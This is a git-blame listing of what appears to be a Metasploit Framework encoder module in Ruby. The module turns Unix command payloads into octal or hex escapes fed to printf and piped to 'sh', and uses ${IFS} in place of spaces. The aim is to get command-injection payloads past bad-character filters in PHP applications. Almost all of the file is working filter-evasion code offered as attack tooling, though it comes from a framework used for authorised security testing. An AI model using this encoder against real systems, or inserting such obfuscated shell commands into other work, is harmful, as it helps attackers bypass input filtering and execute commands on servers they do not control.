2010-06-24 22:36:51 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-06-24 22:36:51 +00:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Encoder
|
2010-06-24 22:36:51 +00:00
|
|
|
|
|
|
|
|
# Has some issues, but overall it's pretty good
|
|
|
|
|
# - printf(1) may not be available
|
|
|
|
|
# - requires: "\x7c\x73\x68\x5c\x78"
|
|
|
|
|
# - doesn't work on windows
|
|
|
|
|
# - min size increase: 4x + 9
|
|
|
|
|
# - max size increase: 4x + 14
|
2011-05-20 09:59:01 +00:00
|
|
|
# However, because it intentionally leaves backslashes unescaped (assuming
|
|
|
|
|
# that PHP's magic_quotes_gpc will take care of escaping them) it is
|
|
|
|
|
# unsuitable for most exploits.
|
|
|
|
|
Rank = ManualRanking
|
2010-06-24 22:36:51 +00:00
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
2025-04-14 00:10:31 +10:00
|
|
|
'Name' => 'printf(1) via PHP magic_quotes Utility Command Encoder',
|
|
|
|
|
'Description' => %q{
|
2010-07-01 23:33:07 +00:00
|
|
|
This encoder uses the printf(1) utility to avoid restricted
|
2017-08-28 20:17:58 -04:00
|
|
|
characters. Some shell variable substitution may also be used
|
2010-10-18 15:41:13 +00:00
|
|
|
if needed symbols are blacklisted. Some characters are intentionally
|
2017-08-28 20:17:58 -04:00
|
|
|
left unescaped since it is assumed that PHP with magic_quotes_gpc
|
2010-10-18 15:41:13 +00:00
|
|
|
enabled will escape them during request handling.
|
2010-06-24 22:36:51 +00:00
|
|
|
},
|
2025-04-14 00:10:31 +10:00
|
|
|
'Author' => 'jduck',
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Platform' => 'unix',
|
|
|
|
|
'EncoderType' => Msf::Encoder::Type::PrintfPHPMagicQuotes)
|
2010-06-24 22:36:51 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Encodes the payload
|
|
|
|
|
#
|
|
|
|
|
def encode_block(state, buf)
|
|
|
|
|
# Skip encoding for empty badchars
|
2025-04-14 00:10:31 +10:00
|
|
|
if state.badchars.empty?
|
2010-06-24 22:36:51 +00:00
|
|
|
return buf
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# If backslash is bad, we are screwed.
|
2025-04-14 00:10:31 +10:00
|
|
|
if state.badchars.include?('\\') ||
|
|
|
|
|
state.badchars.include?('|') ||
|
|
|
|
|
# We must have at least ONE of these two..
|
|
|
|
|
(state.badchars.include?('x') && state.badchars.include?('0'))
|
2015-05-18 15:33:01 -05:00
|
|
|
raise EncodingError
|
2010-06-24 22:36:51 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Now we build a string of the original payload with bad characters
|
|
|
|
|
# into \0<NNN> or \x<HH>
|
2025-04-14 00:10:31 +10:00
|
|
|
if state.badchars.include?('x')
|
|
|
|
|
hex = buf.unpack('C*').collect { |c| '\\0%o' % c }.join
|
2010-06-24 22:36:51 +00:00
|
|
|
else
|
2025-04-14 00:10:31 +10:00
|
|
|
hex = buf.unpack('C*').collect { |c| '\\x%x' % c }.join
|
2010-06-24 22:36:51 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Build the final output
|
2025-04-14 00:10:31 +10:00
|
|
|
ret = 'printf'
|
2010-06-24 22:36:51 +00:00
|
|
|
|
|
|
|
|
# Special case: <SPACE>, try to use ${IFS}
|
2025-04-14 00:10:31 +10:00
|
|
|
if state.badchars.include?(' ')
|
2010-06-24 22:36:51 +00:00
|
|
|
ret << '${IFS}'
|
|
|
|
|
else
|
2025-04-14 00:10:31 +10:00
|
|
|
ret << ' '
|
2010-06-24 22:36:51 +00:00
|
|
|
end
|
|
|
|
|
|
2025-04-14 00:10:31 +10:00
|
|
|
ret << hex << '|sh'
|
2010-06-24 22:36:51 +00:00
|
|
|
|
|
|
|
|
return ret
|
|
|
|
|
end
|
|
|
|
|
end
|
